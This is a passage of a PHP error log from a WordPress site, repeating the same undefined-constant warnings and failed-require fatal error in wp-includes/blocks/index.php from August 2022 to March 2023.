in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Aug-2022 09:56:14 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [19-Aug-2022 14:40:43 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [19-Aug-2022 14:40:43 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [19-Aug-2022 14:40:43 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [19-Aug-2022 14:40:43 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [24-Aug-2022 03:16:15 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [24-Aug-2022 03:16:15 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [24-Aug-2022 03:16:15 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [24-Aug-2022 03:16:15 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [24-Aug-2022 15:44:50 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [24-Aug-2022 15:44:50 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [24-Aug-2022 15:44:50 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [24-Aug-2022 15:44:50 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [24-Aug-2022 20:26:08 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [24-Aug-2022 20:26:08 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [24-Aug-2022 20:26:08 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [24-Aug-2022 20:26:08 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [24-Aug-2022 22:08:02 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [24-Aug-2022 22:08:02 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [24-Aug-2022 22:08:02 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [24-Aug-2022 22:08:02 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Aug-2022 21:02:59 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Aug-2022 21:02:59 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Aug-2022 21:02:59 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Aug-2022 21:02:59 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-Aug-2022 18:24:43 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-Aug-2022 18:24:43 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-Aug-2022 18:24:43 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [26-Aug-2022 18:24:43 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [02-Sep-2022 04:04:29 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [02-Sep-2022 04:04:29 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [02-Sep-2022 04:04:29 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [02-Sep-2022 04:04:29 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-Sep-2022 07:23:02 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-Sep-2022 07:23:02 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-Sep-2022 07:23:02 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-Sep-2022 07:23:02 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-Sep-2022 17:59:51 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-Sep-2022 17:59:51 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-Sep-2022 17:59:51 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-Sep-2022 17:59:51 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-Sep-2022 00:19:17 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-Sep-2022 00:19:17 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-Sep-2022 00:19:17 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-Sep-2022 00:19:17 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Sep-2022 14:42:37 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Sep-2022 14:42:37 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Sep-2022 14:42:37 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [17-Sep-2022 14:42:37 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Sep-2022 19:37:34 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Sep-2022 19:37:34 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Sep-2022 19:37:34 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Sep-2022 19:37:34 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Sep-2022 19:57:53 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Sep-2022 19:57:53 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Sep-2022 19:57:53 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [25-Sep-2022 19:57:53 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [27-Sep-2022 22:47:09 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [27-Sep-2022 22:47:09 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [27-Sep-2022 22:47:09 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [27-Sep-2022 22:47:09 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Oct-2022 05:23:32 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Oct-2022 05:23:32 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Oct-2022 05:23:32 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [07-Oct-2022 05:23:32 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [12-Oct-2022 17:46:46 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [12-Oct-2022 17:46:46 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [12-Oct-2022 17:46:46 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [12-Oct-2022 17:46:46 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Oct-2022 09:07:21 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Oct-2022 09:07:21 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Oct-2022 09:07:21 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Oct-2022 09:07:21 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Oct-2022 09:35:18 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Oct-2022 09:35:18 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Oct-2022 09:35:18 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Oct-2022 09:35:18 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [14-Oct-2022 11:26:28 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [14-Oct-2022 11:26:28 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [14-Oct-2022 11:26:28 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [14-Oct-2022 11:26:28 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [29-Oct-2022 13:33:07 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [29-Oct-2022 13:33:07 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [29-Oct-2022 13:33:07 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [29-Oct-2022 13:33:07 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Nov-2022 07:37:26 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Nov-2022 07:37:26 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Nov-2022 07:37:26 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Nov-2022 07:37:26 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Nov-2022 15:32:17 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Nov-2022 15:32:17 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Nov-2022 15:32:17 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [05-Nov-2022 15:32:17 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-Dec-2022 06:05:33 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-Dec-2022 06:05:33 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-Dec-2022 06:05:33 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [22-Dec-2022 06:05:33 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-Jan-2023 06:26:03 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-Jan-2023 06:26:03 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-Jan-2023 06:26:03 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [10-Jan-2023 06:26:03 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Jan-2023 09:24:41 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Jan-2023 09:24:41 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Jan-2023 09:24:41 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [13-Jan-2023 09:24:41 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-Jan-2023 09:57:17 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-Jan-2023 09:57:17 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-Jan-2023 09:57:17 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [21-Jan-2023 09:57:17 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Feb-2023 02:24:51 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Feb-2023 02:24:51 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Feb-2023 02:24:51 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [08-Feb-2023 02:24:51 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-Feb-2023 23:19:41 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-Feb-2023 23:19:41 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-Feb-2023 23:19:41 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [11-Feb-2023 23:19:41 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [03-Mar-2023 01:25:47 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [03-Mar-2023 01:25:47 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [03-Mar-2023 01:25:47 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [03-Mar-2023 01:25:47 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Mar-2023 02:58:01 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Mar-2023 02:58:01 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Mar-2023 02:58:01 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [04-Mar-2023 02:58:01 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [12-Mar-2023 16:24:07 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [12-Mar-2023 16:24:07 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [12-Mar-2023 16:24:07 UTC] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [12-Mar-2023 16:24:07 UTC] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/opt/cpanel/ea-php72/root/usr/share/pear') in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [18-Mar-2023 00:22:48 UTC] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [18-Mar-2023 00:22:48 UTC] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/mybf1/public_html/menthol.bf1.my/wp-includes/blocks/index.php on line 9 [18-Mar-2023 